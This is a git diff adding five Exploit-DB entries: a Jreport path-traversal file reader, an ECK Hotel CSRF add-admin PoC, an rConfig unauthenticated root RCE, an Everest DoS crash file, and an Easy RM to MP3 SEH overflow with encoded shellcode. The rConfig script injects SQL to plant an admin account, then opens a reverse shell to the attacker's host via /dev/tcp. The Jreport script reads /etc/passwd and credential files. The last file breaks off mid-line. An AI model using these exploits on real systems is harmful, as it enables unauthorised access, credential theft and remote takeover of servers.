diff --git a/exploits/java/webapps/48260.py b/exploits/java/webapps/48260.py new file mode 100755 index 000000000..bef4af3a7 --- /dev/null +++ b/exploits/java/webapps/48260.py @@ -0,0 +1,91 @@ +# Exploit Title: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal +# Date: 2020-03-26 +# Exploit Author: hongphukt +# Vendor Homepage: https://www.jinfonet.com/ +# Software Link: https://www.jinfonet.com/product/download-jreport/ +# Version: JReport 15.6 +# Tested on: Linux, Windows + +Jreport Help function have a path traversal vulnerability in the SendFileServlet allows remote unauthenticated users to view any files on the Operating System with Application services user permission. This vulnerability affects Windows and Unix operating systems. +Technical Details + +Jreport before loggedin have help function with url: + +https://serverip/jreport/sendfile/help/userguide/server/index.htm + +senfile url processing by jet.server.servlets.SendFileServlet class. + + + + sendfile + + jet.server.servlets.SendFileServlet + + + + + + sendfile + + /sendfile/* + + + + + +In jet.server.servlets.SendFileServlet class, request will go on when it’s authenticated or start url by ‘/help/’ + +if ((!isAuthentic) && + + (!path.startsWith("/help/"))) + + { + + httpRptServer.getHttpUserSessionManager().sendUnauthorizedResponse(req, res, this.D, httpRptServer.getResourceManager().getRealm()); + + return; + + } + + + +So the function reading file without any path validation + +Exploit: + +Get login properties, /etc/password file by get url: + + http://jreport.test/jreport/sendfile/help/../bin/login.properties + + http://jreport.test/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd + +# Exploit Code + +import requests +import argparse + +def exploit(url, file): + + session = requests.Session() + rawBody = "\r\n" + response = session.get("{}/jreport/sendfile/help/{}".format(url,file), data=rawBody) + + if response.status_code == 404: + print("The '{}' file was not found.".format(file)) + else: + print("-" *22) + print(response.content) + print("-" *22) + +if __name__ == "__main__": + + parser = argparse.ArgumentParser(description='Jreport Path traversal & Arbitrary File Download') + parser.add_argument('-u', action="store", dest="url", required=True, help='Target URL') + parser.add_argument('-f', action="store", dest="file", required=True, help='The file to download') + args = parser.parse_args() + + exploit(args.url, args.file) + +# python jreport_fileread.py -u http://jreport.address -f "../../../../../../../../../../../../../../etc/passwd/" +# python jreport_fileread.py -u http://jreport.address -f "../bin/login.properties" +# python jreport_fileread.py -u http://jreport.address -f "../bin/server.properties" \ No newline at end of file diff --git a/exploits/php/webapps/48258.txt b/exploits/php/webapps/48258.txt new file mode 100644 index 000000000..240042fec --- /dev/null +++ b/exploits/php/webapps/48258.txt @@ -0,0 +1,27 @@ +# Exploit Title : ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin) +# Product : ECK Hotel +# Version : 1.0-beta +# Date: 2020-03-26 +# Software Download: https://sourceforge.net/projects/eckhotel/files/eck-hotel-v1.0-beta.zip/download +# Exploit Author: Mustafa Emre Gül +# Website: https://emregul.com.tr/ +# Tested On : Win10 x64 +# Description : Simple Hotel Management System. + + +PoC: + + + +
+ + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/48261.py b/exploits/php/webapps/48261.py new file mode 100755 index 000000000..77f09a205 --- /dev/null +++ b/exploits/php/webapps/48261.py @@ -0,0 +1,115 @@ +# Exploit Title: rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution +# Exploit Author: vikingfr +# Greetz : Orange Cyberdefense - team CSR-SO (https://cyberdefense.orange.com) +# Date: 2020-03-12 +# CVE-2019-19509 + CVE-2019-19585 + CVE-2020-10220 +# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_root_RCE_unauth.py +# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig) +# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip +# Install scripts : +# https://www.rconfig.com/downloads/scripts/install_rConfig.sh +# https://www.rconfig.com/downloads/scripts/centos7_install.sh +# https://www.rconfig.com/downloads/scripts/centos6_install.sh +# Version: tested v3.9.4 +# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24 +# +# Notes : If you want to reproduce in your lab environment follow those links : +# http://help.rconfig.com/gettingstarted/installation +# then +# http://help.rconfig.com/gettingstarted/postinstall +# +# Example : +# $ python3 rconfig_root_RCE_unauth_final.py http://1.1.1.1 1.1.1.2 3334 +# rConfig - 3.9 - Unauthenticated root RCE +# [+] Adding a temporary admin user... +# [+] Authenticating as dywzxuvbah... +# [+] Logged in successfully, triggering the payload... +# [+] Check your listener ! +# [+] The reverse shell seems to be opened :-) +# [+] Removing the temporary admin user... +# [+] Done. +# +# $ nc -nvlp 3334 +# listening on [any] 3334 ... +# connect to [1.1.1.2] from (UNKNOWN) [1.1.1.1] 46186 +# sh: no job control in this shell +# sh-4.2# id +# id +# uid=0(root) gid=0(root) groups=0(root) +# sh-4.2# + +#!/usr/bin/python3 +import requests +import sys +import urllib.parse +import string +import random +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) +from requests.exceptions import Timeout + +print ("rConfig - 3.9 - Unauthenticated root RCE") + +if len(sys.argv) != 4: + print ("[+] Usage : ./rconfig_exploit.py https://target yourIP yourPort") + exit() + +target = sys.argv[1] +ip = sys.argv[2] +port = sys.argv[3] + +vuln_page="/commands.inc.php" +vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command" +def generateUsername(stringLength=8): + u= string.ascii_lowercase + return ''.join(random.sample(u,stringLength)) + +print ("[+] Adding a temporary admin user...") +fake_id = str(random.randint(200,900)) +fake_user = generateUsername(10) +fake_pass_md5 = "21232f297a57a5a743894a0e4a801fc3" # hash of 'admin' +fake_userid_md5 = "6c97424dc92f14ae78f8cc13cd08308d" +userleveladmin = 9 # Administrator +addUserPayload="%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20("+fake_id+",%20'"+fake_user+"',%20'"+fake_pass_md5+"',%20'"+fake_userid_md5+"',%209,%20'"+fake_user+"@domain.com',%201346920339,%201);--" +encoded_request = target+vuln_page+vuln_parameters+addUserPayload +firstrequest = requests.session() +exploit_req = firstrequest.get(encoded_request,verify=False) + +request = requests.session() +login_info = { + "user": fake_user, + "pass": "admin", + "sublogin": 1 +} +print ("[+] Authenticating as "+fake_user+"...") +login_request = request.post( + target+"/lib/crud/userprocess.php", + login_info, + verify=False, + allow_redirects=True + ) + +dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False) + +payload = ''' `touch /tmp/.'''+fake_user+'''.txt;sudo zip -q /tmp/.'''+fake_user+'''.zip /tmp/.'''+fake_user+'''.txt -T -TT '/bin/sh -i>& /dev/tcp/{0}/{1} 0>&1 #'` '''.format(ip, port) +if dashboard_request.status_code == 200: + print ("[+] Logged in successfully, triggering the payload...") + encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload)) + print ("[+] Check your listener !") + try: + exploit_req = request.get(encoded_request,timeout=10) + except Timeout: + print('[+] The reverse shell seems to be opened :-)') + else: + print('[-] The command was not executed by the target or you forgot to open a listener...') + +elif dashboard_request.status_code == 302: + print ("[-] Wrong credentials !? Maybe admin were not added...") + exit() + +print("[+] Removing the temporary admin user...") +delUserPayload="%20;DELETE%20FROM%20`users`%20WHERE%20`username`='"+fake_user+"';--" +encoded_request = target+vuln_page+vuln_parameters+delUserPayload +lastrequest = requests.session() +exploit_req = lastrequest.get(encoded_request,verify=False) +print ("[+] Done.") \ No newline at end of file diff --git a/exploits/windows/dos/48259.py b/exploits/windows/dos/48259.py new file mode 100755 index 000000000..8adc0c170 --- /dev/null +++ b/exploits/windows/dos/48259.py @@ -0,0 +1,21 @@ +# Exploit Title: Everest 5.50.2100 - 'Open File' Denial of Service (PoC) +# Discovery by: Ivan Marmolejo +# Discovery Date: 2020-03-24 +# Software Link : http://www.lavalys.com/ +# Tested Version: 5.50.2100 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Home Single Language + +# Steps to produce the crash: +#1.- Run python code: Everest.py +#2.- Open Everest.txt and copy content to clipboard +#3.- Open "Everest Ultimate Edition" +#4.- Select "Informe" > "Asistente de Informes" > "Next" > Select "Abrir Archivo" +#5.- In "Abrir Archivo" field paste Clipboard +#6.- Select "Next" +#7.- Crashed + +buffer = "\x41" * 450 +f = open ("Everest.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48257.py b/exploits/windows/local/48257.py new file mode 100755 index 000000000..f355d8d4d --- /dev/null +++ b/exploits/windows/local/48257.py @@ -0,0 +1,76 @@ +# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH) +# Date: 2020-03-26 +# Author: Felipe Winsnes +# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe +# Version: 2.7.3.700 +# Tested on: Windows 7 (x86) + +# Proof of Concept: +# 1.- Run the python script, it will create a new file "poc.txt" +# 2.- Copy the content of the new file 'poc.txt' to clipboard +# 3.- Open the Application +# 4.- If the 'Preferences' windows pops up, just click 'Cancel' +# 4.- Click 'Batch' +# 5.- Delete everything on the parameter 'Input:' and paste the clipboard there +# 6.- Select OK +# 7.- Some Windows message boxes will pop up, click OK. +# 8.- Profit + +# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Easy-RM-to-MP3-Converter-2.7.3.700-Input/ + +import struct +import sys + +# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread +# Payload size: 447 bytes + +buf = b"" +buf += b"\xdb\xc4\xd9\x74\x24\xf4\x58\x50\x59\x49\x49\x49\x49" +buf += b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37" +buf += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41" +buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" +buf += b"\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x6b\x58\x4d\x52" +buf += b"\x55\x50\x73\x30\x67\x70\x55\x30\x6c\x49\x4a\x45\x65" +buf += b"\x61\x69\x50\x62\x44\x6c\x4b\x76\x30\x46\x50\x4e\x6b" +buf += b"\x76\x32\x46\x6c\x6c\x4b\x52\x72\x65\x44\x6e\x6b\x72" +buf += b"\x52\x74\x68\x44\x4f\x4f\x47\x73\x7a\x64\x66\x65\x61" +buf += b"\x49\x6f\x4e\x4c\x47\x4c\x50\x61\x71\x6c\x34\x42\x66" +buf += b"\x4c\x71\x30\x6b\x71\x58\x4f\x44\x4d\x46\x61\x68\x47" +buf += b"\x4a\x42\x6c\x32\x51\x42\x63\x67\x4c\x4b\x76\x32\x72" +buf += b"\x30\x4e\x6b\x33\x7a\x35\x6c\x4c\x4b\x50\x4c\x32\x31" +buf += b"\x31\x68\x59\x73\x53\x78\x55\x51\x6b\x61\x70\x51\x4e" +buf += b"\x6b\x70\x59\x47\x50\x35\x51\x68\x53\x6e\x6b\x51\x59" +buf += b"\x37\x68\x6a\x43\x45\x6a\x62\x69\x6c\x4b\x54\x74\x6c" +buf += b"\x4b\x55\x51\x4a\x76\x76\x51\x39\x6f\x6c\x6c\x6b\x71" +buf += b"\x4a\x6f\x36\x6d\x77\x71\x6a\x67\x77\x48\x69\x70\x33" +buf += b"\x45\x7a\x56\x64\x43\x61\x6d\x68\x78\x45\x6b\x53\x4d" +buf += b"\x66\x44\x53\x45\x69\x74\x70\x58\x4e\x6b\x76\x38\x74" +buf += b"\x64\x77\x71\x38\x53\x52\x46\x6e\x6b\x34\x4c\x72\x6b" +buf += b"\x6e\x6b\x56\x38\x45\x4c\x57\x71\x38\x53\x6c\x4b\x75" +buf += b"\x54\x6e\x6b\x76\x61\x4a\x70\x4e\x69\x67\x34\x44\x64" +buf += b"\x31\x34\x51\x4b\x73\x6b\x43\x51\x30\x59\x51\x4a\x53" +buf += b"\x61\x59\x6f\x49\x70\x31\x4f\x33\x6f\x63\x6a\x6c\x4b" +buf += b"\x57\x62\x68\x6b\x6c\x4d\x73\x6d\x42\x4a\x33\x31\x4c" +buf += b"\x4d\x4f\x75\x4e\x52\x73\x30\x35\x50\x47\x70\x66\x30" +buf += b"\x51\x78\x35\x61\x4e\x6b\x42\x4f\x6f\x77\x59\x6f\x58" +buf += b"\x55\x4f\x4b\x4d\x30\x35\x4d\x75\x7a\x65\x5a\x63\x58" +buf += b"\x49\x36\x4f\x65\x6d\x6d\x6d\x4d\x79\x6f\x79\x45\x45" +buf += b"\x6c\x77\x76\x33\x4c\x57\x7a\x4f\x70\x6b\x4b\x69\x70" +buf += b"\x74\x35\x57\x75\x6d\x6b\x33\x77\x65\x43\x43\x42\x62" +buf += b"\x4f\x32\x4a\x37\x70\x53\x63\x79\x6f\x6a\x75\x33\x53" +buf += b"\x35\x31\x72\x4c\x61\x73\x54\x6e\x61\x75\x61\x68\x75" +buf += b"\x35\x57\x70\x41\x41" + +nseh = struct.pack("